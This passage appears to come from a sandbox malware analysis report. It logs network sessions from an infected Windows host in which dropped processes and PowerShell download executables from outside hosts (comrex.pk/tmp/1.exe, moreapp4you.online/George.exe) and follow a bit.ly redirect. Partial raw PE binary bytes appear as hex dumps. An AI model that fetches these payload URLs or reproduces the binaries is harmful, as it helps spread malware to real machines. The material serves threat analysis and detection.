2024-06-23 22:10:16 UTC	1378	IN	Data Raw: 74 75 00 00 41 8b d7 48 8d 4d 60 e8 10 5a 00 00 48 8d 4d 60 e8 ab fe ff ff eb 36 4c 8d 44 24 4c 49 8b d7 48 8d 4d 60 e8 d0 ee ff ff ba 80 00 00 00 48 8d 4d 60 48 ff 15 94 70 00 00 0f 1f 44 00 00 48 8d 4d 60 48 ff 15 4c 70 00 00 0f 1f 44 00 00 48 8d 54 24 20 48 8b ce 48 ff 15 f0 71 00 00 0f 1f 44 00 00 85 c0 0f 85 09 ff ff ff 48 8b ce 48 ff 15 81 72 00 00 0f 1f 44 00 00 48 8b cf 48 ff 15 6a 70 00 00 0f 1f 44 00 00 48 8b 8d 70 01 00 00 48 33 cc e8 4e 62 00 00 4c 8d 9c 24 80 02 00 00 49 8b 5b 28 49 8b 73 30 49 8b e3 41 5f 5f 5d c3 cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 81 ec 40 01 00 00 48 8b 05 b0 9d 00 00 48 33 c4 48 89 84 24 30 01 00 00 bf 04 01 00 00 48 8d 4c 24 20 8b d7 33 db 48 ff 15 d8 6f 00 00 0f 1f 44 00 00 85 c0 74 6a 4c 8d 05 50 75 00 Data Ascii: tuAHM`ZHM`6LD$LIHM`HM`HpDHM`HLpDHT$ HHqDHHrDHHjpDHpH3NbL$I[(Is0IA__]H\$WH@HH3H$0HL$ 3HoDtjLPu
2024-06-23 22:10:16 UTC	1378	IN	Data Raw: 41 ff 4c 8b c6 ba 04 01 00 00 48 0f 45 c1 48 8d 4c 24 40 40 88 38 e8 a3 54 00 00 48 8d 44 24 38 41 b9 19 00 02 00 45 33 c0 48 89 44 24 20 48 8d 54 24 40 48 c7 c1 02 00 00 80 48 ff 15 0d 6a 00 00 0f 1f 44 00 00 85 c0 0f 85 bd 00 00 00 48 8b 4c 24 38 48 8d 44 24 34 48 89 44 24 28 4c 8d 4c 24 30 45 33 c0 48 89 5c 24 20 48 8d 15 a5 6f 00 00 48 ff 15 16 6a 00 00 0f 1f 44 00 00 85 c0 75 49 8b 44 24 30 83 f8 02 75 39 41 b8 04 01 00 00 48 8d 54 24 40 48 8b cb 48 ff 15 37 6c 00 00 0f 1f 44 00 00 85 c0 74 17 4c 8d 44 24 40 ba 04 01 00 00 48 8b cb e8 64 e8 ff ff 41 8b ff eb 0b 8b 44 24 30 41 3b c7 41 0f 44 ff 48 8b 4c 24 38 48 ff 15 c8 69 00 00 0f 1f 44 00 00 eb 2a ba 04 01 00 00 48 8b cb 48 ff 15 7a 6a 00 00 0f 1f 44 00 00 eb 18 48 8b cb ba 04 01 00 00 48 ff 15 24 Data Ascii: ALHEHL$@@8THD$8AE3HD$ HT$@HHjDHL$8HD$4HD$(LL$0E3H\$ HoHjDuID$0u9AHT$@HH7lDtLD$@HdAD$0A;ADHL$8HiD*HHzjDHH$
2024-06-23 22:10:16 UTC	1378	IN	Data Raw: cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 30 49 8b d8 48 8b f9 48 ff 15 a8 66 00 00 0f 1f 44 00 00 33 f6 85 c0 78 48 3c 06 72 44 48 8d 0d 9a 6b 00 00 48 ff 15 fb 66 00 00 0f 1f 44 00 00 48 85 c0 74 2c 48 8d 15 a2 6b 00 00 48 8b c8 48 ff 15 b8 65 00 00 0f 1f 44 00 00 48 85 c0 74 11 45 33 c9 8d 56 01 45 33 c0 33 c9 ff 15 8d 69 00 00 48 8b d3 89 35 78 a8 00 00 48 8b cf e8 e0 00 00 00 85 c0 0f 84 a3 00 00 00 e8 0b 04 00 00 8b d8 e8 04 35 00 00 85 db 0f 84 8f 00 00 00 40 38 35 23 a0 00 00 0f 85 82 00 00 00 8b 3d 59 b1 00 00 40 f6 c7 01 74 76 40 f6 c7 02 75 1e 39 35 2b a8 00 00 75 16 0f b7 0d 5a b1 00 00 8b 1d 58 b1 00 00 e8 ef f5 ff ff 3b d8 74 52 40 f6 c7 04 75 2b c7 44 24 28 04 00 00 00 4c 8d 05 be 69 00 00 45 33 c9 c7 44 24 20 40 00 Data Ascii: H\$Ht$WH0IHHfD3xH<rDHkHfDHt,HkHHeDHtE3VE33iH5xH5@85#=Y@tv@u95+uZX;tR@u+D$(LiE3D$ @
2024-06-23 22:10:16 UTC	1378	IN	Data Raw: 00 00 0f 1f 44 00 00 48 85 c0 74 0f 33 d2 48 8d 0d 4d a4 00 00 ff 15 87 64 00 00 48 8b cb 48 ff 15 ad 60 00 00 0f 1f 44 00 00 39 3d 26 9b 00 00 0f 85 8f 00 00 00 39 3d 76 ac 00 00 0f 85 83 00 00 00 ba 04 01 00 00 48 8d 8c 24 40 01 00 00 48 ff 15 4c 60 00 00 0f 1f 44 00 00 85 c0 75 4d ba f0 04 00 00 45 33 c9 89 7c 24 28 45 33 c0 c7 44 24 20 10 00 00 00 33 c9 e8 a1 1b 00 00 e8 d0 44 00 00 89 05 0e a3 00 00 33 c0 48 8b 8c 24 50 02 00 00 48 33 cc e8 28 52 00 00 48 8b 9c 24 70 02 00 00 48 81 c4 60 02 00 00 5f c3 cc ba 02 00 00 00 48 8d 8c 24 40 01 00 00 44 8b c2 e8 35 3a 00 00 85 c0 74 c3 48 8d 0d 96 a3 00 00 48 ff 15 9f 60 00 00 0f 1f 44 00 00 85 c0 75 07 ba bc 04 00 00 eb 81 39 3d 75 9a 00 00 0f 85 90 00 00 00 48 8d 05 9c 9d 00 00 b9 28 00 00 00 c7 00 01 00 Data Ascii: DHt3HMdHH`D9=&9=vH$@HL`DuME3\|$(E3D$ 3D3H$PH3(RH$pH`_H$@D5:tHH`Du9=uH(
2024-06-23 22:10:16 UTC	1378	IN	Data Raw: cd e8 5a 34 00 00 85 c0 75 07 ba be 04 00 00 eb 43 80 3d e8 9e 00 00 5c 75 09 80 3d e0 9e 00 00 5c 74 15 44 8b c3 8b d3 48 8b cd e8 64 35 00 00 85 c0 0f 84 b5 00 00 00 48 8b d3 48 8b cf 48 ff 15 eb 5d 00 00 0f 1f 44 00 00 e9 9e 00 00 00 ba bf 04 00 00 83 64 24 28 00 45 33 c9 45 33 c0 48 8b cf 44 89 7c 24 20 e8 50 16 00 00 eb 7f 48 ff 15 e3 5d 00 00 0f 1f 44 00 00 48 8b d0 48 8b cf e8 d3 14 00 00 48 8d 15 dc 9d 00 00 48 8b cf 48 ff 15 2a 5d 00 00 0f 1f 44 00 00 48 83 64 24 20 00 41 b9 03 01 00 00 ba 35 08 00 00 48 8b cf 45 8d 41 c2 48 ff 15 16 5d 00 00 0f 1f 44 00 00 66 39 1d a2 a6 00 00 75 25 ba 36 08 00 00 48 8b cf 48 ff 15 09 5d 00 00 0f 1f 44 00 00 48 8b c8 33 d2 48 ff 15 28 5d 00 00 0f 1f 44 00 00 48 8b c3 eb 13 33 d2 48 ff 15 35 5d 00 00 0f 1f 44 00 Data Ascii: Z4uC=\u=\tDHd5HHH]Dd$(E3E3HD\|$ PH]DHHHHH*]DHd$ A5HEAH]Df9u%6HH]DH3H(]DH3H5]D
2024-06-23 22:10:16 UTC	1378	IN	Data Raw: 01 74 0a bf ca 04 00 00 e9 00 02 00 00 be 01 00 00 00 66 89 0d ed a1 00 00 0f b7 c1 89 35 18 85 00 00 89 35 0e 85 00 00 8d 4e 02 3b d1 77 21 8b c6 66 89 05 ce a1 00 00 72 08 75 40 41 83 fe 33 73 3a 89 1d f2 84 00 00 89 1d e8 84 00 00 eb 2c 83 fa 05 72 27 0f b7 c1 66 89 0d a7 a1 00 00 eb 1b be 01 00 00 00 66 89 1d 99 a1 00 00 89 35 c7 84 00 00 0f b7 c3 89 35 ba 84 00 00 39 1d 20 90 00 00 0f 85 3a 02 00 00 4d 85 ed 0f 84 31 02 00 00 44 0f b7 7c 24 4c 4d 8d 65 40 66 f7 d8 89 5c 24 30 44 8b d3 44 8b db 48 1b c0 48 83 e0 c4 4c 03 e0 4d 63 cb 83 c8 ff 4f 8d 04 49 43 3b 14 c4 73 04 8b c8 eb 12 76 04 8b ce eb 0c 47 3b 74 c4 04 72 ef 8b cb 0f 97 c1 43 3b 54 c4 0c 72 12 76 04 8b c6 eb 0c 47 3b 74 c4 10 72 05 8b c3 0f 97 c0 85 c9 0f 88 ac 00 00 00 85 c0 0f 8f a4 00 Data Ascii: tf55N;w!fru@A3s:,r'ff559 :M1D\|$LMe@f\$0DDHHLMcOIC;svG;trC;TrvG;tr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49724	58.65.168.132	443	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:18 UTC	44	OUT	GET /tmp/1.exe HTTP/1.1 Host: comrex.pk
2024-06-23 22:10:18 UTC	223	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 22:10:18 GMT Server: Apache Last-Modified: Sun, 23 Jun 2024 22:10:02 GMT Accept-Ranges: bytes Content-Length: 176063 Connection: close Content-Type: application/x-msdownload
2024-06-23 22:10:18 UTC	7969	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b2 af 75 56 f6 ce 1b 05 f6 ce 1b 05 f6 ce 1b 05 99 b8 b0 05 ed ce 1b 05 99 b8 85 05 ed ce 1b 05 99 b8 b1 05 99 ce 1b 05 ff b6 88 05 f1 ce 1b 05 f6 ce 1a 05 9c ce 1b 05 99 b8 b4 05 f7 ce 1b 05 99 b8 81 05 f7 ce 1b 05 99 b8 86 05 f7 ce 1b 05 52 69 63 68 f6 ce 1b 05 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 89 00 d8 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 24 02 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$uVRichPELc$
2024-06-23 22:10:19 UTC	8000	IN	Data Raw: e8 26 36 00 00 56 e8 a8 05 00 00 56 e8 a1 fe ff ff 83 c4 18 5e c3 8b ff 55 8b ec 56 8b 75 08 33 c0 eb 0f 85 c0 75 10 8b 0e 85 c9 74 02 ff d1 83 c6 04 3b 75 0c 72 ec 5e 5d c3 8b ff 55 8b ec 83 3d 8c 4e 42 00 00 74 19 68 8c 4e 42 00 e8 3d 38 00 00 59 85 c0 74 0a ff 75 08 ff 15 8c 4e 42 00 59 e8 69 37 00 00 68 ac 41 42 00 68 90 41 42 00 e8 a1 ff ff ff 59 59 85 c0 75 54 56 57 68 ca 62 40 00 e8 e5 36 00 00 b8 88 41 42 00 be 8c 41 42 00 59 8b f8 3b c6 73 0f 8b 07 85 c0 74 02 ff d0 83 c7 04 3b fe 72 f1 83 3d 20 c2 43 00 00 5f 5e 74 1b 68 20 c2 43 00 e8 d3 37 00 00 59 85 c0 74 0c 6a 00 6a 02 6a 00 ff 15 20 c2 43 00 33 c0 5d c3 6a 20 68 70 80 42 00 e8 32 2b 00 00 6a 08 e8 14 35 00 00 59 83 65 fc 00 33 c0 40 39 05 38 45 43 00 0f 84 d8 00 00 00 a3 34 45 43 00 8a 45 Data Ascii: &6VV^UVu3ut;ur^]U=NBthNB=8YtuNBYi7hABhABYYuTVWhb@6ABABY;st;r= C_^th C7Ytjjj C3]j hpB2+j5Ye3@98EC4ECE
2024-06-23 22:10:19 UTC	8000	IN	Data Raw: 00 75 20 53 e8 67 26 00 00 59 89 07 85 c0 75 13 8d 46 14 6a 02 89 46 08 89 06 58 89 46 18 89 46 04 eb 0d 8b 3f 89 7e 08 89 3e 89 5e 18 89 5e 04 81 4e 0c 02 11 00 00 33 c0 5f 40 5b eb 02 33 c0 5e 5d c3 8b ff 55 8b ec 83 7d 08 00 74 27 56 8b 75 0c f7 46 0c 00 10 00 00 74 19 56 e8 20 3c 00 00 81 66 0c ff ee ff ff 83 66 18 00 83 26 00 83 66 08 00 59 5e 5d c3 f6 41 0c 40 74 06 83 79 08 00 74 24 ff 49 04 78 0b 8b 11 88 02 ff 01 0f b6 c0 eb 0c 0f be c0 51 50 e8 cd 3d 00 00 59 59 83 f8 ff 75 03 09 06 c3 ff 06 c3 8b ff 55 8b ec 51 53 56 8b f0 8b d9 e8 f8 f6 ff ff f6 47 0c 40 8b 00 89 45 fc 74 0a 83 7f 08 00 75 04 01 1e eb 4a e8 de f6 ff ff 83 20 00 eb 28 8b 45 08 8a 00 8b cf 4b e8 90 ff ff ff ff 45 08 83 3e ff 75 13 e8 bf f6 ff ff 83 38 2a 75 0d 8b cf b0 3f e8 75 Data Ascii: u Sg&YuFjFXFF?~>^^N3_@[3^]U}t'VuFtV <ff&fY^]A@tyt$IxQP=YYuUQSVG@EtuJ (EKE>u8*u?u
2024-06-23 22:10:19 UTC	8000	IN	Data Raw: c3 50 46 e8 3f 2b 00 00 59 85 c0 74 13 ff 07 83 7d 0c 00 74 0a 8b 4d 0c 8a 06 ff 45 0c 88 01 46 8b 55 0c 8b 4d 10 84 db 74 32 83 7d fc 00 75 a9 80 fb 20 74 05 80 fb 09 75 9f 85 d2 74 04 c6 42 ff 00 83 65 fc 00 80 3e 00 0f 84 e9 00 00 00 8a 06 3c 20 74 04 3c 09 75 06 46 eb f3 4e eb e3 80 3e 00 0f 84 d0 00 00 00 83 7d 08 00 74 09 8b 45 08 83 45 08 04 89 10 ff 01 33 db 43 33 c9 eb 02 46 41 80 3e 5c 74 f9 80 3e 22 75 26 f6 c1 01 75 1f 83 7d fc 00 74 0c 8d 46 01 80 38 22 75 04 8b f0 eb 0d 33 c0 33 db 39 45 fc 0f 94 c0 89 45 fc d1 e9 85 c9 74 12 49 85 d2 74 04 c6 02 5c 42 ff 07 85 c9 75 f1 89 55 0c 8a 06 84 c0 74 55 83 7d fc 00 75 08 3c 20 74 4b 3c 09 74 47 85 db 74 3d 0f be c0 50 85 d2 74 23 e8 5a 2a 00 00 59 85 c0 74 0d 8a 06 8b 4d 0c ff 45 0c 88 01 46 ff 07 Data Ascii: PF?+Yt}tMEFUMt2}u tutBe>< t<uFN>}tEE3C3FA>\t>"u&u}tF8"u339EEtIt\BuUtU}u< tK<tGt=Pt#Z*YtMEF
2024-06-23 22:10:19 UTC	8000	IN	Data Raw: 59 a8 82 75 17 e8 29 b9 ff ff c7 00 09 00 00 00 83 4e 0c 20 83 c8 ff e9 2f 01 00 00 a8 40 74 0d e8 0e b9 ff ff c7 00 22 00 00 00 eb e3 53 33 db a8 01 74 16 89 5e 04 a8 10 0f 84 87 00 00 00 8b 4e 08 83 e0 fe 89 0e 89 46 0c 8b 46 0c 83 e0 ef 83 c8 02 89 46 0c 89 5e 04 89 5d fc a9 0c 01 00 00 75 2c e8 0a bf ff ff 83 c0 20 3b f0 74 0c e8 fe be ff ff 83 c0 40 3b f0 75 0d ff 75 0c e8 11 ff ff ff 59 85 c0 75 07 56 e8 92 2a 00 00 59 f7 46 0c 08 01 00 00 57 0f 84 80 00 00 00 8b 46 08 8b 3e 8d 48 01 89 0e 8b 4e 18 2b f8 49 89 4e 04 3b fb 7e 1d 57 50 ff 75 0c e8 46 27 00 00 83 c4 0c 89 45 fc eb 4d 83 c8 20 89 46 0c 83 c8 ff eb 79 8b 4d 0c 83 f9 ff 74 1b 83 f9 fe 74 16 8b c1 83 e0 1f 8b d1 c1 fa 05 c1 e0 06 03 04 95 e0 b0 43 00 eb 05 b8 c8 9b 42 00 f6 40 04 20 74 14 Data Ascii: Yu)N /@t"S3t^NFFF^]u, ;t@;uuYuV*YFWF>HN+IN;~WPuF'EM FyMttCB@ t
2024-06-23 22:10:19 UTC	8000	IN	Data Raw: 08 23 4d 0c f7 d0 66 23 45 fc 66 0b c1 0f b7 c0 89 45 0c d9 6d 0c 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 51 8a 4d 08 f6 c1 01 74 0a db 2d bc 9e 42 00 db 5d 08 9b f6 c1 08 74 10 9b df e0 db 2d bc 9e 42 00 dd 5d f8 9b 9b df e0 f6 c1 10 74 0a db 2d c8 9e 42 00 dd 5d f8 9b f6 c1 04 74 09 d9 ee d9 e8 de f1 dd d8 9b f6 c1 20 74 06 d9 eb dd 5d f8 9b c9 c3 6a 08 68 28 82 42 00 e8 8f ae ff ff 33 c0 39 05 d4 b0 43 00 74 56 f6 45 08 40 74 48 39 05 d4 9e 42 00 74 40 89 45 fc 0f ae 55 08 eb 2e 8b 45 ec 8b 00 8b 00 3d 05 00 00 c0 74 0a 3d 1d 00 00 c0 74 03 33 c0 c3 33 c0 40 c3 8b 65 e8 83 25 d4 9e 42 00 00 83 65 08 bf 0f ae 55 08 c7 45 fc fe ff ff ff eb 08 83 65 08 bf 0f ae 55 08 e8 6f ae ff ff c3 8b ff 55 8b ec 56 8b 75 08 57 83 cf ff 85 f6 75 14 e8 f7 98 ff ff c7 00 16 Data Ascii: #Mf#EfEmEUQQMt-B]t-B]t-B]t t]jh(B39CtVE@tH9Bt@EU.E=t=t33@e%BeUEeUoUVuWu
2024-06-23 22:10:19 UTC	8000	IN	Data Raw: c6 8b 55 ca c1 e8 10 eb 2f c7 45 94 04 00 00 00 eb 1e 33 f6 b8 ff 7f 00 00 ba 00 00 00 80 33 c9 c7 45 94 02 00 00 00 eb 0f c7 45 94 01 00 00 00 33 c9 33 c0 33 d2 33 f6 8b 7d 88 0b 45 8c 66 89 0f 66 89 47 0a 8b 45 94 89 77 02 89 57 06 5b 8b 4d fc 5f 33 cd 5e e8 22 a5 ff ff c9 c3 8d 49 00 a5 c1 40 00 f7 c1 40 00 42 c2 40 00 73 c2 40 00 b8 c2 40 00 f0 c2 40 00 04 c3 40 00 5d c3 40 00 48 c3 40 00 c5 c3 40 00 ba c3 40 00 69 c3 40 00 8b ff 55 8b ec 83 ec 74 a1 c0 9b 42 00 33 c5 89 45 fc 0f b7 45 10 0f b7 55 10 b9 00 80 00 00 23 c1 53 8b 5d 1c 89 45 a0 8d 41 ff 56 23 d0 66 83 7d a0 00 57 89 5d 9c c7 45 d0 cc cc cc cc c7 45 d4 cc cc cc cc c7 45 d8 cc cc fb 3f c7 45 8c 01 00 00 00 74 06 c6 43 02 2d eb 04 c6 43 02 20 8b 75 0c 8b 7d 08 66 85 d2 75 37 85 f6 0f 85 cf Data Ascii: U/E33EE3333}EffGEwW[M_3^"I@@B@s@@@@]@H@@@i@UtB3EEU#S]EAV#f}W]EEE?EtC-C u}fu7
2024-06-23 22:10:19 UTC	8000	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-06-23 22:10:19 UTC	8000	IN	Data Raw: 92 ff e6 ec 69 35 fa c5 1f af 68 54 97 ac 1b 2e 94 f2 62 0f 47 31 e3 30 b1 c0 45 d8 1d 37 4e 74 b6 d0 23 f4 09 6c d0 59 9c 2c 0e 84 98 16 3c e2 2b cd 35 0a 8e e9 64 f0 5b 2e a0 c0 a6 dc 87 52 4c 63 7a 81 1d d5 a0 ed 05 70 dd f7 1b 63 aa f0 c5 0a 1d 3c 7b b0 1a e7 8e 9a db c0 cb 9b ca 1f 2b c9 e5 af 70 76 c5 d5 a2 c9 a6 64 3a 45 dd af d0 22 36 57 e6 8f d1 74 2c 39 e0 c8 ab a7 cf b4 b3 e1 1b 89 95 dd e0 e1 d4 2b 11 16 e4 fb 6e be ab 91 f3 28 6f f5 07 64 2f f7 25 20 52 c9 4a 33 34 9c 91 e0 d3 1c 64 48 31 81 eb 14 5b d2 c9 0e 84 6a 81 a1 7f f9 a7 bd 82 e5 7b 97 30 26 8a ae db fe 6e 4c 94 96 ff 52 8c e9 b0 51 44 76 10 20 fd fb f0 d3 78 63 6c ec 27 4d ae 0d 8d 3d 28 72 d4 32 26 8b 1a 98 b2 15 3d 24 45 95 5e c3 72 58 a1 36 b0 a3 c2 c5 a0 4e d0 a9 dd 99 ec cb 30 Data Ascii: i5hT.bG10E7Nt#lY,<+5d[.RLczpc<{+pvd:E"6Wt,9+n(od/% RJ34dH1[j{0&nLRQDv xcl'M=(r2&=$E^rX6N0
2024-06-23 22:10:19 UTC	8000	IN	Data Raw: 33 de fe 0a 3b 75 fe 50 77 4d 09 22 b8 12 d4 20 e4 06 61 7a 6b 10 f5 e8 87 eb af de bc 1e 52 ab bf bb 09 60 4a 16 cd a3 c5 44 80 98 43 95 f9 c2 a0 29 c1 36 82 be f0 85 56 c5 90 d9 42 6b 4d 96 73 69 81 13 71 3c 59 60 6f c0 a8 da 21 4d c9 a2 89 72 f7 8c e3 14 cb 36 d6 f6 51 f0 76 e1 65 e8 19 d9 dd b0 4c 3b 8d 61 1b 66 7b a8 73 bd 02 7f de ed 15 78 46 d7 7f 16 17 c9 57 fd be 22 0d d1 10 7e 34 50 88 b1 47 ac 13 ad e6 00 6f e7 5b 95 39 e0 4a 53 29 d7 cd 8f 10 f0 db 60 7f 6f ea 23 e8 89 8e 7f 4d e7 cf a3 61 41 7c 66 ba 27 b8 8c 96 f5 1b 4f 5c 8a cc 9b ef 28 7d 1e b9 0f cb ce 5b ca e7 b5 06 7d ab cf b0 ef 12 e0 1a 5c 7b 7c 4f 6f d0 b0 45 7a 34 c3 9c 59 24 92 e0 f8 d5 d9 10 f1 12 36 02 73 4f be 15 42 22 5b 72 83 75 b4 85 5e 71 18 55 f5 7e 6e 5d 56 e9 95 b9 31 47 Data Ascii: 3;uPwM" azkR`JDC)6VBkMsiq<Y`o!Mr6QveL;af{sxFW"~4PGo[9JS)`o#MaA\|f'O\(}[}\{\|OoEz4Y$6sOB"[ru^qU~n]V1G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49727	67.199.248.11	443	6152	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:23 UTC	158	OUT	GET /4c7L8Zs HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: bit.ly Connection: Keep-Alive
2024-06-23 22:10:23 UTC	480	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Sun, 23 Jun 2024 22:10:23 GMT Content-Type: text/html; charset=utf-8 Content-Length: 105 Cache-Control: private, max-age=90 Content-Security-Policy: referrer always; Location: https://pixel.com/ Referrer-Policy: unsafe-url Set-Cookie: _bit=o5nman-07b23346b388a970e4-003; Domain=bit.ly; Expires=Fri, 20 Dec 2024 22:10:23 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-06-23 22:10:23 UTC	105	IN	Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 78 65 6c 2e 63 6f 6d 2f 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Bitly</title></head><body><a href="https://pixel.com/">moved here</a></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49731	54.67.42.145	443	6152	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:24 UTC	154	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: pixel.com Connection: Keep-Alive
2024-06-23 22:10:24 UTC	230	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 22:10:24 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 366 Cache-Control: private, no-cache, no-store, max-age=0 Expires: Mon, 01 Jan 1990 0:00:00 GMT
2024-06-23 22:10:24 UTC	366	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 50 69 78 65 6c 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 50 69 78 65 6c 2e 63 6f 6d 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 70 69 78 65 6c 2c 63 6f 6d 22 3e 3c 2f 68 65 61 64 3e 3c 66 72 61 6d 65 73 65 74 20 72 6f 77 73 3d 22 31 30 30 25 22 20 62 6f 72 64 65 72 3d 22 30 22 20 66 72 61 6d 65 73 70 61 63 69 6e 67 3d 22 30 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 3e 3c 66 72 61 6d 65 20 6e 61 6d 65 3d 22 6d 61 69 6e 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 69 78 65 6c 2e 63 6f 6d 2f 70 69 78 2f 69 6e 64 65 78 2e 68 74 6d Data Ascii: <html><head><title>Pixel.com</title><meta name="description" content="Pixel.com"><meta name="keywords" content="pixel,com"></head><frameset rows="100%" border="0" framespacing="0" frameborder="0"><frame name="main" src="https://www.pixel.com/pix/index.htm

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49738	31.31.196.208	443	6200	C:\Users\user\AppData\Local\Temp\1000007001\ama.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:27 UTC	78	OUT	GET /George.exe HTTP/1.1 Host: moreapp4you.online Connection: Keep-Alive
2024-06-23 22:10:27 UTC	253	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 23 Jun 2024 22:10:27 GMT Content-Type: application/octet-stream Content-Length: 5037056 Connection: close Last-Modified: Sun, 23 Jun 2024 09:17:41 GMT ETag: "4cdc00-61b8b22f50470" Accept-Ranges: bytes
2024-06-23 22:10:27 UTC	16131	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 08 00 56 e8 72 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 bc 03 00 00 c4 08 00 00 00 00 00 e8 2e 69 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 81 00 00 04 00 00 20 92 4d 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a8 35 3a 00 a0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELVrf.i@ M@5:
2024-06-23 22:10:27 UTC	16384	IN	Data Raw: 00 00 00 00 00 f4 2f 7c 0e 04 bd b7 6d 68 59 6b 90 2c 29 32 0f 1e 14 0e 53 02 40 da 76 46 b5 ce 12 c9 9d 28 d9 42 39 9d ad 7e 05 20 11 d3 49 dd c7 18 e7 dc 79 44 1e 91 c3 e6 59 64 59 7b 6f 72 0f 75 9b 25 e7 97 6a d7 3d 27 82 e6 24 69 26 7a e7 8f ed f9 84 39 e3 7f 82 98 44 2d 05 8a a9 29 38 cb c3 f0 28 96 b9 85 f6 34 03 26 23 3a b0 62 e9 2c 61 0e 54 a8 ac fb 66 15 dd 3e 35 cf ac cb 5f d0 59 e2 b7 9f 4d e9 2c 61 0e 1b 39 4b 9d 37 ab 26 d2 0b 8b 5a 2e 90 d9 05 c3 41 99 ea bd b7 4d e9 2c 61 0e 91 6d 0f 74 53 61 da a2 e5 e7 9b a5 5e fb 93 28 94 4d e6 f3 c1 e1 1b 3d 1f 34 49 a2 8b 6e c2 a2 61 78 64 e5 e6 f3 c1 e1 1b 2b d7 a5 